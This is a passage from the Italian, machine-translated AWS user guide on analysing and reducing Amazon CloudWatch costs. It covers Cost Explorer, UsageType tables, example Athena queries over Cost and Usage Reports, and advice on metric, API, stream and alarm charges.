https://docs.aws.amazon.com/it_it/AmazonCloudWatch/latest/monitoring/cloudwatch_billing.html | Analisi, ottimizzazione e riduzione dei costi CloudWatch - Amazon CloudWatch Analisi, ottimizzazione e riduzione dei costi CloudWatch - Amazon CloudWatch Documentazione Amazon CloudWatch Guida per l’utente Analizza i dati di CloudWatch costi e utilizzo con Cost Explorer Analizza i dati di CloudWatch costi e utilizzo con AWS Cost and Usage Report s e Athena Ottimizzazione e riduzione dei costi delle metriche CloudWatch Ottimizzazione e riduzione dei costi degli allarmi CloudWatch Ottimizzazione e riduzione dei costi di Container Insights CloudWatch Ottimizzazione e riduzione dei costi di Database Insights CloudWatch Ottimizzazione e riduzione dei costi dei log CloudWatch Le traduzioni sono generate tramite traduzione automatica. In caso di conflitto tra il contenuto di una traduzione e la versione originale in Inglese, quest'ultima prevarrà. Analisi, ottimizzazione e riduzione dei costi CloudWatch Questa sezione descrive come le CloudWatch funzionalità di Amazon generano costi. Fornisce inoltre metodi che possono aiutarti ad analizzare, ottimizzare e ridurre CloudWatch i costi. In questa sezione, a volte facciamo riferimento ai prezzi per descrivere CloudWatch le funzionalità. Per informazioni sui prezzi, consulta la pagina CloudWatchdei prezzi di Amazon . Argomenti Analizza i dati di CloudWatch costi e utilizzo con Cost Explorer Analizza i dati di CloudWatch costi e utilizzo con AWS Cost and Usage Report s e Athena Ottimizzazione e riduzione dei costi delle metriche CloudWatch Ottimizzazione e riduzione dei costi degli allarmi CloudWatch Ottimizzazione e riduzione dei costi di Container Insights CloudWatch Ottimizzazione e riduzione dei costi di Database Insights CloudWatch Ottimizzazione e riduzione dei costi dei log CloudWatch Analizza i dati di CloudWatch costi e utilizzo con Cost Explorer Con AWS Cost Explorer, puoi visualizzare e analizzare i dati sui costi e sull'utilizzo Servizi AWS nel tempo, tra cui. CloudWatch Per ulteriori informazioni, consulta Guida introduttiva AWS Cost Explorer . La procedura seguente descrive come utilizzare Cost Explorer per visualizzare e analizzare i dati di CloudWatch costi e utilizzo. Per visualizzare e analizzare i dati relativi a CloudWatch costi e utilizzo Accedi alla console Cost Explorer a https://console.aws.amazon.com/cost-management/home#/custom . In FILTRI , per Assistenza , seleziona. CloudWatch Per Group by (Gruppo per), scegli Usage Type (Tipo di utilizzo). Puoi anche raggruppare i risultati in base ad altre categorie, ad esempio le seguenti: Operazione API : scopri quali operazioni API hanno generato la maggior parte dei costi. Regione : scopri quali regioni hanno generato la maggior parte dei costi. L'immagine seguente mostra un esempio dei costi generati dalle CloudWatch funzionalità nell'arco di sei mesi. Per vedere quali CloudWatch funzionalità hanno generato il maggior numero di costi, guarda i valori di UsageType . Ad esempio, EU-CW:GMD-Metrics rappresenta i costi generati dalle richieste API in CloudWatch blocco. Nota Le stringhe per UsageType corrispondono a caratteristiche e regioni specifiche. Ad esempio, la prima parte di EU-CW:GMD-Metrics ( EU ) corrisponde alla regione Europa (Irlanda) e la seconda parte EU-CW:GMD-Metrics di GMD-Metrics () CloudWatch corrisponde alle richieste API in blocco. L'intera stringa per UsageType può essere formattata come segue: <Region>-CW:<Feature> o <Region>-<Feature> . Alcune CloudWatch funzionalità, come i registri e gli allarmi, utilizzano anche la Global regione per identificare l'utilizzo del piano gratuito. Ad esempio, Global-DataScanned-Bytes rappresenta l'utilizzo gratuito dell'inserimento dei dati di CloudWatch Logs. Per migliorare la leggibilità, le stringhe per UsageType nelle tabelle di questo documento sono state abbreviate utilizzando i loro suffissi. Ad esempio, EU-CW:GMD-Metrics è abbreviata in GMD-Metrics . La tabella seguente include i nomi di ciascuna CloudWatch funzionalità, elenca i nomi di ciascuna funzionalità secondaria ed elenca le stringhe per. UsageType CloudWatch caratteristica CloudWatch funzionalità secondaria UsageType CloudWatch metriche Parametri personalizzati MetricMonitorUsage Monitoraggio dettagliato MetricMonitorUsage Parametri incorporati MetricMonitorUsage CloudWatch Richieste API Richieste API Requests Bulk (Ottieni) GMD-Metrics Contributor Insights GIRR-Metrics Snapshot di immagini bitmap GMWI-Metrics CloudWatch flussi metrici Flussi di parametri MetricStreamUsage CloudWatch cruscotti Pannello di controllo con 50 parametri o meno DashboardsUsageHour-Basic Pannello di controllo con più di 50 parametri DashboardsUsageHour CloudWatch allarmi Standard (allarme parametro) AlarmMonitorUsage Ad alta risoluzione (allarme parametro) HighResAlarmMonitorUsage Allarme per le query di Approfondimenti sulle metriche MetricInsightAlarmUsage Composito (allarme aggregato) CompositeAlarmMonitorUsage Container Insights Osservabilità avanzata per Amazon EKS ObservationUsage Osservabilità avanzata per Amazon ECS MetricsUsage CloudWatch Segnali applicativi Application Signals con Transaction Search Application-Signals-Bytes, XRay-Spans-Indexed Application Signals con X-Ray Application-Signals CloudWatch registri personalizzati Raccolta (importazione dei dati per la classe di log Standard) DataProcessing-Bytes Raccolta (importazione dei dati per la classe di log Infrequent Access) DataProcessingIA-Bytes Analizza (query) DataScanned-Bytes Analisi (Live Tail) Logs-LiveTail Archiviazione (archivio ) TimedStorage-ByteHrs Rilevazione e mascheramento (protezione dei dati) DataProtection-Bytes CloudWatch registri venduti Consegna (classe di CloudWatch log Amazon Logs Standard) VendedLog-Bytes Consegna (classe di CloudWatch log Logs Infrequent Access) VendedLogIA-Bytes Consegna (Amazon S3) S3-Egress-Bytes Consegna (Amazon S3) in formato Parquet S3-Egress-InputBytes Consegna (Amazon Data Firehose) FH-Egress-Bytes Contributor Insights CloudWatch Registri (regole) ContributorInsightRules CloudWatch Registri (eventi) ContributorInsightEvents Amazon DynamoDB (regole) ContributorRulesManaged Eventi DynamoDB ContributorEventsManaged Database Insights Serverless DatabaseInsights-ACU-Hours Assegnata DatabaseInsights-vCPU-Hours Illimitato DatabaseInsights-ACU-Hours Canary (synthetics) Esegui Canary-runs RUM Eventi RUM-event Monitoraggio della rete Network Synthetic Monitor CWNMHybrid-Paid Monitor Internet (risorse monitorate) InternetMonitor-MonitoredResource Monitor Internet (reti urbane monitorate) InternetMonitor-CityNetwork Analizza i dati di CloudWatch costi e utilizzo con AWS Cost and Usage Report s e Athena Un altro modo per analizzare i dati di CloudWatch costi e utilizzo consiste nell'utilizzare AWS Cost and Usage Report s con Amazon Athena. AWS Cost and Usage Report s contengono un set completo di dati su costi e utilizzo. Puoi creare report che tengono traccia dei costi e dell'utilizzo e puoi pubblicare questi report in un bucket S3 a scelta dell'utente. Puoi anche scaricare ed eliminare i report dal bucket S3. Per ulteriori informazioni, consulta What are AWS Cost and Usage Report s? nella Guida AWS Cost and Usage Report per l'utente s . Nota Non ci sono costi per l'utilizzo di AWS Cost and Usage Report s. Paghi l'archiviazione solo quando pubblichi i report su Amazon Simple Storage Service (Amazon S3). Per ulteriori informazioni, consulta Quote e restrizioni nella Guida per l'utente di AWS Cost and Usage Report . Athena è un servizio di interrogazione che puoi utilizzare con AWS Cost and Usage Report s per analizzare i dati di costi e utilizzo. Puoi eseguire query sui report nel bucket S3 senza bisogno di scaricarli prima. Per ulteriori informazioni, consulta Che cos'è Amazon Athena? nella Guida per l'utente di Amazon Athena . Per ulteriori informazioni, consulta Che cos'è Amazon Athena? nella Guida per l'utente di Amazon Athena . Per ulteriori informazioni sui prezzi, consulta Prezzi di Amazon Athena . La procedura seguente descrive il processo per abilitare AWS Cost and Usage Report s e integrare il servizio con Athena. La procedura contiene due query di esempio che è possibile utilizzare per analizzare i dati CloudWatch sui costi e sull'utilizzo. Nota Puoi utilizzare una qualsiasi delle query di esempio contenute in questo documento. Tutte le query di esempio in questo documento corrispondono a un database denominato costandusagereport e mostrano i risultati per il mese di aprile e l'anno 2025. Puoi modificare queste informazioni. Tuttavia, prima di eseguire una query, assicurati che il nome del database corrisponda al nome del database nella query. Per analizzare i dati sui costi e sull'utilizzo con AWS Cost and Usage Report s e Athena Abilita AWS Cost and Usage Report s. Per ulteriori informazioni, consulta Creazione di report su costi e utilizzo nella Guida per l'utente di AWS Cost and Usage Report . Suggerimento Quando crei i tuoi report, assicurati di selezionare Includi risorsa IDs . In caso contrario, i rapporti non includeranno la colonna line_item_resource_id . Questa riga consente di identificare ulteriormente i costi durante l'analisi dei dati relativi ai costi e all'utilizzo. Integra AWS Cost and Usage Report s con Athena. Per ulteriori informazioni, consulta Configurazione di Athena utilizzando i CloudFormation modelli nella Guida per l' utente AWS Cost and Usage Report s. Esegui query sui rapporti relativi ai costi e all'utilizzo. Esempio di query Athena per mostrare CloudWatch i costi mensili È possibile utilizzare la seguente query per mostrare quali CloudWatch funzionalità hanno generato il maggior numero di costi in un determinato mese. SELECT CASE -- Metrics WHEN line_item_usage_type LIKE '%%MetricMonitorUsage%%' THEN 'Metrics (Custom, Detailed monitoring management portal EMF)' WHEN line_item_usage_type LIKE '%%Requests%%' THEN 'Metrics (API Requests)' WHEN line_item_usage_type LIKE '%%GMD-Metrics%%' THEN 'Metrics (Bulk API Requests)' WHEN line_item_usage_type LIKE '%%MetricStreamUsage%%' THEN 'Metric Streams' -- Contributor Insights WHEN line_item_usage_type LIKE '%%Contributor%%' THEN 'Contributor Insights' -- Dashboard WHEN line_item_usage_type LIKE '%%DashboardsUsageHour%%' THEN 'Dashboards' -- Alarms WHEN line_item_usage_type LIKE '%%AlarmMonitorUsage%%' THEN 'Alarms (Standard)' WHEN line_item_usage_type LIKE '%%HighResAlarmMonitorUsage%%' THEN 'Alarms (High Resolution)' WHEN line_item_usage_type LIKE '%%MetricInsightAlarmUsage%%' THEN 'Alarms (Metrics Insights)' WHEN line_item_usage_type LIKE '%%CompositeAlarmMonitorUsage%%' THEN 'Alarms (Composite)' -- Container Insights with enhanced observability WHEN (line_item_usage_type LIKE '%%MetricsUsage%%' OR line_item_usage_type LIKE '%%ObservationUsage%%') THEN 'Container Insights (Enhanced Observability)' -- Database Insights WHEN line_item_usage_type LIKE '%%DatabaseInsights%%' THEN 'Database Insights' -- Logs WHEN line_item_usage_type LIKE '%%DataProcessing-Bytes%%' THEN 'Logs (Collect - Data Ingestion)' WHEN line_item_usage_type LIKE '%%DataProcessingIA-Bytes%%' THEN 'Infrequent Access Logs (Collect - Data Ingestion)' WHEN line_item_usage_type LIKE '%%DataProtection-Bytes%%' THEN 'Logs (Data Protection - Detect and Mask)' WHEN line_item_usage_type LIKE '%%TimedStorage-ByteHrs%%' THEN 'Logs (Storage - Archival)' WHEN line_item_usage_type LIKE '%%DataScanned-Bytes%%' THEN 'Logs (Analyze - Logs Insights queries)' WHEN line_item_usage_type LIKE '%%Logs-LiveTail%%' THEN 'Logs (Analyze - Logs Live Tail)' -- Vended Logs WHEN line_item_usage_type LIKE '%%VendedLog-Bytes%%' THEN 'Vended Logs (Delivered to CW)' WHEN line_item_usage_type LIKE '%%VendedLogIA-Bytes%%' THEN 'Vended Infrequent Access Logs (Delivered to CW)' WHEN line_item_usage_type LIKE '%%FH-Egress-Bytes%%' THEN 'Vended Logs (Delivered to Data Firehose)' WHEN (line_item_usage_type LIKE '%%S3-Egress%%') THEN 'Vended Logs (Delivered to S3)' -- Network Monitoring WHEN line_item_usage_type LIKE '%%CWNMHybrid-Paid%%' THEN 'Network Monitor' WHEN line_item_usage_type LIKE '%%InternetMonitor%%' THEN 'Internet Monitor' -- Other WHEN line_item_usage_type LIKE '%%Application-Signals%%' THEN 'Application Signals' WHEN line_item_usage_type LIKE '%%Canary-runs%%' THEN 'Synthetics' WHEN line_item_usage_type LIKE '%%RUM-event%%' THEN 'RUM' ELSE 'Others' END AS UsageType, -- REGEXP_EXTRACT(line_item_resource_id,'^(?:.+?:) { 5}(.+)$',1) as ResourceID, SUM(CAST(line_item_usage_amount AS double)) AS UsageQuantity, SUM(CAST(line_item_unblended_cost AS decimal(16,8))) AS TotalSpend FROM costandusagereport WHERE product_product_name = 'AmazonCloudWatch' AND year='2025' AND month='4' AND line_item_line_item_type NOT IN ('Tax','Credit','Refund','EdpDiscount','Fee','RIFee') -- AND line_item_usage_account_id = '123456789012' – If you want to filter on a specific account, you can remove this comment at the beginning of the line and specify an AWS account. GROUP BY 1 ORDER BY TotalSpend DESC, UsageType; Esempio di query Athena per mostrare come le CloudWatch funzionalità generavano costi La seguente query può essere usata per mostrare i risultati per UsageType e Operation . Questo mostra come le CloudWatch funzionalità hanno generato costi. I risultati mostrano anche i valori per UsageQuantity e TotalSpend , in modo da poter visualizzare i costi di utilizzo totali. Suggerimento Per ulteriori informazioni su UsageType , aggiungi la riga seguente a questa query: line_item_line_item_description Questa riga crea una colonna denominata Description (Descrizione). SELECT bill_payer_account_id as Payer, line_item_usage_account_id as LinkedAccount, line_item_usage_type AS UsageType, line_item_operation AS Operation, line_item_resource_id AS ResourceID, SUM(CAST(line_item_usage_amount AS double)) AS UsageQuantity, SUM(CAST(line_item_unblended_cost AS decimal(16,8))) AS TotalSpend FROM costandusagereport WHERE product_product_name = 'AmazonCloudWatch' AND year='2025' AND month='4' AND line_item_line_item_type NOT IN ('Tax','Credit','Refund','EdpDiscount','Fee','RIFee') GROUP BY bill_payer_account_id, line_item_usage_account_id, line_item_usage_type, line_item_resource_id, line_item_operation Ottimizzazione e riduzione dei costi delle metriche CloudWatch Molti Servizi AWS, come Amazon Elastic Compute Cloud (Amazon EC2), Amazon S3 e Amazon Data Firehose, inviano automaticamente i parametri CloudWatch gratuitamente a. Tuttavia, i parametri raggruppati nelle seguenti categorie possono comportare costi aggiuntivi: Parametri personalizzati, monitoraggio dettagliato e parametri incorporati Richieste API Flussi di parametri Per ulteriori informazioni, consulta Usare i CloudWatch parametri di Amazon . Parametri personalizzati Puoi creare parametri personalizzati per organizzare i punti di dati in qualsiasi ordine e tasso. Tutti i parametri personalizzati sono ripartiti proporzionalmente all'ora. Vengono misurati solo quando vengono inviati a. CloudWatch Per informazioni sui prezzi delle metriche, consulta la pagina dei prezzi di Amazon CloudWatch . La tabella seguente elenca i nomi delle funzionalità secondarie pertinenti per le metriche. CloudWatch La tabella include le stringhe per UsageType e Operation , che possono aiutarti ad analizzare e identificare i costi correlati ai parametri. Nota Per ottenere maggiori dettagli sui parametri elencati nella tabella seguente mentre esegui query sui dati relativi ai costi e all'utilizzo con Athena, abbina le stringhe per Operation con i risultati che vengono mostrati per line_item_operation . CloudWatch funzionalità secondaria UsageType Operation Scopo Parametri personalizzati MetricMonitorUsage MetricStorage Parametri personalizzati Monitoraggio dettagliato MetricMonitorUsage MetricStorage:AWS/ { Service} Monitoraggio dettagliato Parametri incorporati MetricMonitorUsage MetricStorage:AWS/Logs-EMF Registri di parametri incorporati Filtri di log MetricMonitorUsage MetricStorage:AWS/CloudWatchLogs Filtri per i parametri di gruppo di log Monitoraggio dettagliato CloudWatch dispone di due tipi di monitoraggio: Monitoraggio base Il monitoraggio di base è gratuito e abilitato automaticamente per tutti i Servizi AWS che supportano la funzionalità. Monitoraggio dettagliato Il monitoraggio dettagliato comporta costi e aggiunge diversi miglioramenti a seconda del. Servizio AWS Per ognuno di essi Servizio AWS che supporta il monitoraggio dettagliato, è possibile scegliere se abilitarlo per quel servizio. Per ulteriori informazioni, consulta Monitoraggio di base e dettagliato . Nota Altri Servizi AWS supportano il monitoraggio dettagliato e potrebbero fare riferimento a questa funzionalità con un nome diverso. Ad esempio, il monitoraggio dettagliato per Amazon S3 è indicato come parametri di richiesta . Analogamente alle metriche personalizzate, il monitoraggio dettagliato viene ripartito proporzionalmente all'ora e misurato solo al momento dell'invio dei dati a. CloudWatch Il monitoraggio dettagliato genera costi in base al numero di metriche a cui vengono inviate. CloudWatch Per ridurre i costi, abilita il monitoraggio dettagliato solo quando necessario. Per informazioni sui prezzi del monitoraggio dettagliato, consulta la pagina CloudWatchdei prezzi di Amazon . Esempio: query Athena Puoi utilizzare la seguente query per mostrare in quali EC2 istanze è abilitato il monitoraggio dettagliato. SELECT bill_payer_account_id as Payer, line_item_usage_account_id as LinkedAccount, line_item_usage_type AS UsageType, line_item_operation AS Operation, line_item_resource_id AS ResourceID, SUM(CAST(line_item_usage_amount AS double)) AS UsageQuantity, SUM(CAST(line_item_unblended_cost AS decimal(16,8))) AS TotalSpend FROM costandusagereport WHERE product_product_name = 'AmazonCloudWatch' AND year='2025' AND month='4' AND line_item_operation='MetricStorage:AWS/EC2' AND line_item_line_item_type NOT IN ('Tax','Credit','Refund','EdpDiscount','Fee','RIFee') GROUP BY bill_payer_account_id, line_item_usage_account_id, line_item_usage_type, line_item_resource_id, line_item_operation, line_item_line_item_description ORDER BY line_item_operation Parametri incorporati Con il formato metrico CloudWatch incorporato, è possibile importare i dati dell'applicazione come dati di registro, in modo da generare metriche utilizzabili. Per ulteriori informazioni, consultate Ingestione di log ad alta cardinalità e generazione di metriche con il formato metrico incorporato. CloudWatch I parametri incorporati generano costi in base al numero di registri importati, al numero di registri archiviati e al numero di parametri personalizzati generati. La tabella seguente elenca i nomi delle funzionalità secondarie pertinenti per il formato metrico incorporato. CloudWatch La tabella include le stringhe per UsageType e Operation , che possono aiutarti ad analizzare e identificare i costi. CloudWatch funzionalità secondaria UsageType Operation Scopo Parametri personalizzati MetricMonitorUsage MetricStorage:AWS/Logs-EMF Registri di parametri incorporati Importazione di registri DataProcessing-Bytes PutLogEvents Carica un batch di log eventi sul gruppo di log o flusso di log specificato Archiviazione dei log TimedStorage-ByteHrs HourlyStorageMetering Memorizza i log per ora e i log per byte in Logs CloudWatch Per analizzare i costi, usa AWS Cost and Usage Report s con Athena in modo da poter identificare quali metriche generano costi e determinare come vengono generati i costi. Per sfruttare al meglio i costi generati dal formato metrico CloudWatch incorporato, evita di creare metriche basate su dimensioni ad alta cardinalità. In questo modo, CloudWatch non viene creata una metrica personalizzata per ogni combinazione di dimensioni unica. Per ulteriori informazioni, consulta Dimensioni . Richieste API CloudWatch ha i seguenti tipi di richieste API: Richieste API Bulk (Ottieni) Contributor Insights Snapshot di immagini bitmap Le richieste API generano costi in base al tipo di richiesta e al numero di parametri richiesti. Nella tabella seguente sono elencati i tipi di richieste API e include le stringhe per UsageType e Operation , che possono aiutarti ad analizzare e identificare i costi relativi alle API. Tipo di richiesta API UsageType Operation Scopo Richieste API Requests GetMetricStatistics Recupera statistiche per i parametri specificati Requests ListMetrics Elenca i parametri specificati Requests PutMetricData Pubblica punti dati metrici su CloudWatch Requests GetDashboard Visualizza i dettagli per i pannelli di controllo specificati Requests ListDashboards Elenca i pannelli di controllo presenti nell'account Requests PutDashboard Crea o aggiorna un pannello di controllo Requests DeleteDashboards Elimina tutti i pannelli di controllo specificati Bulk (Ottieni) GMD-Metrics GetMetricData Recupera i valori delle metriche CloudWatch Contributor Insights GIRR-Metrics GetInsightRuleReport Restituisce i dati di serie temporali raccolti da una regola di Contributor Insights Snapshot di immagini bitmap GMWI-Metrics GetMetricWidgetImage Recupera un'istantanea di una o più CloudWatch metriche come immagine bitmap Per analizzare i costi, utilizza Cost Explorer e raggruppa i risultati per API Operation (Operazione API). La console di fatturazione mostra le richieste API generiche in Richieste. UsageType Vengono visualizzate come X,XX USD per 1.000 richieste - [Regione] . Questa tariffa si applica a tutte le richieste con le UsageType Richieste, aggregate insieme, oltre al limite consentito dal piano gratuito. I costi per le richieste API variano e quando superi il numero di chiamate API che ti vengono fornite nell'ambito del limite del piano gratuito, devi sostenere dei AWS costi. Nota Solo le richieste API con UsageType richieste sono incluse nel limite del piano AWS gratuito. Le richieste API con qualsiasi altra richiesta UsageType comportano costi a partire dalla prima chiamata. Per ulteriori informazioni, consulta Utilizzo del piano gratuito di AWS nella Guida per l'utente di AWS Billing . Le richieste API che in genere determinano i costi sono le richieste Put e Get . Per monitorare l'origine delle richieste API e identificare gli utenti all'interno del tuo account, abilita gli eventi relativi ai dati CloudTrail e analizza gli eventi registrati utilizzando: Amazon CloudWatch Logs con Log Insights Amazon S3 con Amazon Athena Nota Gli eventi di dati non vengono registrati automaticamente dai percorsi e dai datastore di eventi. La registrazione degli eventi di dati comporta costi aggiuntivi. Per ulteriori informazioni, consultare AWS CloudTrail Prezzi . Per ulteriori informazioni, consulta Registrazione degli eventi relativi ai dati e Identificazione delle risorse che determinano l'utilizzo dei CloudWatch GetMetricData costi . AWS CloudTrail API calls not incurring charges Quando registri gli eventi CloudWatch relativi ai dati CloudTrail, potresti ricevere più chiamate di quante ne hai iniziate. Ciò accade perché la registrazione degli eventi CloudWatch relativi ai dati CloudTrail acquisisce le azioni dell'API dai componenti interni. Le chiamate ai componenti interni non comportano costi. CloudWatch Tuttavia, questi eventi vengono conteggiati ai fini del totale di registrazione CloudTrail degli eventi e possono influire sui costi. CloudTrail Ad esempio, CloudTrail registrerà GetMetricData le chiamate avviate da un account di monitoraggio per recuperare dati da un account di origine, nonché GetMetricData le chiamate avviate dai CloudWatch dashboard per aggiornare i dati dei widget. Queste chiamate API non comportano costi. CloudWatch PutMetricData Ogni chiamata CloudWatch PutMetricData API comporta dei costi. Le chiamate frequenti possono aumentare notevolmente i costi, soprattutto negli scenari di monitoraggio ad alto volume. Per ridurre i costi, prendi in considerazione l'idea di raggruppare più metriche in ogni chiamata API o di regolare la frequenza di monitoraggio. Per ulteriori informazioni, PutMetricData consulta Amazon CloudWatch API Reference . Per sfruttare al massimo i costi generati da PutMetricData , raggruppa più dati nelle tue chiamate API. A seconda del caso d'uso, prendi in considerazione l'utilizzo di CloudWatch Logs o del formato metrico CloudWatch incorporato per inserire i dati metrici. Per maggiori informazioni, consulta le seguenti risorse: Che cos'è Amazon CloudWatch Logs? nella Guida per l' utente di Amazon CloudWatch Logs Inserimento di log ad alta cardinalità e generazione di metriche con formato metrico incorporato CloudWatch Ridurre i costi e concentrarsi sui nostri clienti con le metriche personalizzate CloudWatch integrate di Amazon GetMetricData Il funzionamento dell' CloudWatch GetMetricData API può anche aumentare significativamente i costi. Talvolta, gli strumenti di monitoraggio di terze parti incrementano i costi se estraggono spesso dati per generare informazioni. Per ulteriori informazioni sui prezzi e sulle best practice di utilizzo GetMetricData , GetMetricData consulta Amazon CloudWatch API Reference . Per ridurre i costi generati da GetMetricData , prendi in considerazione la possibilità di estrarre solo dati monitorati e utilizzati o considera di estrarre dati meno spesso. A seconda del caso d'uso, è possibile prendere in considerazione l'utilizzo di flussi di parametri anziché GetMetricData , in modo da poter inviare dati quasi in tempo reale a terze parti a un costo inferiore. Per maggiori informazioni, consulta le seguenti risorse: Utilizzo dei flussi di parametri CloudWatch Metric Streams: invia i AWS parametri ai partner e alle tue app in tempo reale GetMetricStatistics A seconda del caso d'uso, potresti considerare l'utilizzo di GetMetricStatistics anziché di GetMetricData . Con GetMetricData , è possibile recuperare i dati in modo rapido e su larga scala. Tuttavia, GetMetricStatistics è incluso nel limite del piano AWS gratuito per un massimo di un milione di richieste API, il che può aiutarti a ridurre i costi se non hai bisogno di recuperare tante metriche e punti dati per chiamata. Per maggiori informazioni, consulta le seguenti risorse: GetMetricStatistics nell' Amazon CloudWatch API Reference Devo usare GetMetricData o GetMetricStatistics? Nota I chiamanti esterni effettuano chiamate API. Per APIs questo sono supportati da eventi CloudTrail relativi ai dati (come GetMetricData e GetMetricWidgetImage ), che puoi utilizzare CloudTrail per identificare i principali chiamanti dell' CloudWatch API e potenzialmente mitigare o identificare le chiamate impreviste. Per ulteriori informazioni, consulta Come usare per CloudTrail analizzare l'utilizzo dell'API. CloudWatch Per altri CloudWatch APIs non supportati da CloudTrail, puoi aprire una richiesta di supporto tecnico al CloudWatch team e chiedere informazioni su di essi. Per informazioni sulla creazione di una richiesta di supporto tecnico, vedi Come posso ottenere supporto tecnico da AWS? . CloudWatch flussi metrici Con i flussi CloudWatch metrici, puoi inviare metriche in modo continuo a AWS destinazioni e destinazioni di fornitori di servizi di terze parti. I flussi di parametri generano costi in base al numero di aggiornamenti dei parametri. Gli aggiornamenti dei parametri includono sempre i valori per le seguenti statistiche: Minimum Maximum Sample Count Sum Per ulteriori informazioni, consulta Statistiche che possono essere trasmesse . Per analizzare i costi generati dai flussi CloudWatch metrici, usa AWS Cost and Usage Report s con Athena. In questo modo, è possibile identificare quali flussi di parametri generano costi e determinare come vengono generati i costi. Esempio: query Athena La seguente query può essere usata per monitorare quali flussi di parametri generano costi in base al relativo nome della risorsa Amazon (ARN). SELECT SPLIT_PART(line_item_resource_id,'/',2) AS "Stream Name", line_item_resource_id as ARN, SUM(CAST(line_item_unblended_cost AS decimal(16,2))) AS TotalSpend FROM costandusagereport WHERE product_product_name = 'AmazonCloudWatch' AND year='2025' AND month='4' AND line_item_line_item_type NOT IN ('Tax','Credit','Refund','EdpDiscount','Fee','RIFee') -- AND line_item_usage_account_id = '123456789012' – If you want to filter on a specific account, you can remove this comment at the beginning of the line and specify an AWS account. AND line_item_usage_type LIKE '%%MetricStreamUsage%%' GROUP BY line_item_resource_id ORDER BY TotalSpend DESC Per ridurre i costi generati dai flussi CloudWatch metrici, trasmetti in streaming solo le metriche che apportano valore alla tua azienda. Puoi anche interrompere o mettere in pausa qualsiasi flusso di parametri che non stai utilizzando. Ottimizzazione e riduzione dei costi degli allarmi CloudWatch Con gli CloudWatch allarmi, puoi creare allarmi basati su una singola metrica, allarmi basati su una query di Metrics Insights e allarmi compositi che controllano altri allarmi. Nota I costi degli allarmi di parametri e compositi sono ripartiti proporzionalmente all'ora. I costi per gli allarmi sono sostenuti solo fintanto che gli allarmi esistono. Per ottimizzare i costi, assicurati di non lasciare allarmi configurati in modo errato o di basso valore. Per aiutarti, puoi automatizzare la pulizia degli allarmi che non ti servono più. CloudWatch Per ulteriori informazioni, consulta Automating Amazon CloudWatch Alarm Cleanup at Scale Allarmi dei parametri Gli allarmi dei parametri hanno le seguenti impostazioni di risoluzione: Standard (valutato ogni 60 secondi) Alta risoluzione (valutato ogni 10 secondi) Quando crei un allarme di parametro, i costi si basano sull'impostazione della risoluzione dell'allarme e sul numero di parametri a cui fa riferimento l'allarme. Ad esempio, un allarme di parametro che fa riferimento a un parametro comporta un costo parametro di allarme all'ora. Per ulteriori informazioni, consulta Usare gli CloudWatch allarmi Amazon . Se crei un allarme di parametro contenente un'espressione matematica del parametro che fa riferimento a più parametri, dovrai sostenere un costo per ogni parametro di allarme a cui si fa riferimento nell'espressione matematica del parametro. Per informazioni su come creare un allarme metrico che contenga un'espressione matematica metrica, consulta Creazione di un CloudWatch allarme basato su un' espressione matematica metrica. Se crei un allarme di rilevamento delle anomalie in cui l'allarme analizza i dati delle metriche precedenti per creare un modello di valori attesi, dovrai sostenere un costo per ogni metrica di allarme a cui si fa riferimento nell'allarme più due metriche aggiuntive, una per ciascuna delle metriche dei limiti di banda (superiore e inferiore) create dal modello di rilevamento delle anomalie. Per informazioni su come creare un allarme di rilevamento di valori anomali, vedere Creazione di un allarme basato sul rilevamento di valori anomali. CloudWatch Allarmi per le query di Approfondimenti sulle metriche Gli allarmi per le query di Approfondimenti sulle metriche rappresentano un tipo specifico di allarme, disponibile solo con risoluzione standard (valutata ogni 60 secondi). Quando crei un allarme per le query di Approfondimenti sulle metriche, i costi si basano sul numero di parametri analizzati dalla query a cui fa riferimento l'allarme. Ad esempio, un allarme per le query di Approfondimenti sulle metriche che fa riferimento a una query il cui filtro corrisponde a dieci parametri comporta un costo orario di dieci parametri analizzati. Per ulteriori informazioni, consulta l'esempio di prezzo su Amazon CloudWatch Pricing . Se crei un allarme contenente sia una query di Approfondimenti sulle metriche che un'espressione matematica del parametro, tale allarme viene segnalato come allarme per le query di Approfondimenti sulle metriche. Se l'allarme contiene un'espressione matematica del parametro che fa riferimento ad altre metriche, oltre a quelle analizzati dalla query di Approfondimenti sulle metriche, dovrai sostenere un costo aggiuntivo per ogni parametro di allarme a cui si fa riferimento nell'espressione matematica del parametro. Per informazioni su come creare un allarme metrico che contenga un'espressione matematica metrica, consulta Creazione di un CloudWatch allarme basato su un'espressione matematica metrica . Allarmi compositi Gli allarmi compositi contengono espressioni di regole che specificano come devono valutare gli stati di altri allarmi per determinare il loro stato. Gli allarmi compositi hanno un costo orario standard, indipendentemente dal numero di altri allarmi valutati. Gli allarmi a cui fanno riferimento gli allarmi compositi nelle espressioni delle regole comportano costi separati. Per ulteriori informazioni, consulta Creazione di allarmi compositi . Tipi di utilizzo degli allarmi La tabella seguente elenca i nomi delle funzionalità secondarie pertinenti per gli allarmi. CloudWatch La tabella include le stringhe per UsageType , che possono aiutarti ad analizzare e identificare i costi relativi agli allarmi. CloudWatch funzionalità secondaria UsageType Allarme dei parametri standard AlarmMonitorUsage Allarme di parametro ad alta risoluzione HighResAlarmMonitorUsage Allarme per le query di Approfondimenti sulle metriche MetricInsightAlarmUsage Allarme composito CompositeAlarmMonitorUsage Riduzione dei costi degli allarmi Per ottimizzare i costi generati dagli allarmi matematici metrici che aggregano quattro o più metriche, puoi aggregare i dati prima che vengano inviati a. CloudWatch In questo modo, puoi creare un allarme per un singolo parametro invece di uno che aggrega i dati per più parametri. Per ulteriori informazioni, consulta Pubblicazione di parametri personalizzati . Per ottimizzare i costi generati dagli allarmi per le query di Approfondimenti sulle metriche, puoi assicurarti che il filtro utilizzato per la query corrisponda solo ai parametri che desideri monitorare. Il modo migliore per ridurre i costi è rimuovere tutti gli allarmi non necessari o non utilizzati. Ad esempio, puoi eliminare gli allarmi che valutano i parametri emessi da risorse AWS che non esistono più. Esempio di utilizzo di DescribeAlarms per verificare la presenza di allarmi in stato INSUFFICIENT_DATA Se elimini una risorsa ma non gli allarmi dei parametri emessi dalla risorsa, gli allarmi continueranno ad esistere e passeranno allo stato INSUFFICIENT_DATA . Per verificare la presenza di allarmi nello stato INSUFFICIENT_DATA , utilizza il seguente comando di AWS Command Line Interface (AWS CLI). aws cloudwatch describe-alarms –state-value INSUFFICIENT_DATA Per ulteriori informazioni, consulta Automating Amazon CloudWatch Alarm Cleanup at Scale . Altri modi per ridurre i costi sono descritti di seguito: Assicurati di creare allarmi per i parametri corretti. Assicurati di non avere alcun allarme abilitato nelle regioni in cui non stai 